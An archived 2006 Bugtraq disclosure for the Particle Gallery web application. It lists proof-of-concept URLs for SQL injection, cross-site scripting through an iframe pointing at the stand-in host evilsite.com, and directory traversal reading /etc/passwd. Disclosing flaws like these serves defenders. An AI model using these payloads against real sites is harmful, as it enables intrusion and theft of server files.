lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: 5 Jun 2006 23:37:01 -0000 From: luny@...fucktard.com To: bugtraq@...urityfocus.com Subject: Particle Gallery v1.0.0 Homepage: http://www.particlesoft.net/particlegallery/ Effected files: viewimage.php viewalbum.php SQL Injection: http://www.example.com/viewimage.php?imageid=' XSS Vulnerability proof of concept: http://www.example.com/viewimage.php?imageid=<iframe%20src=http://evilsite.com/scriptlet.html> Possible Directory Traversal ?: http://www.example.com/viewalbum.php?albumid=../../../../etc/passwd/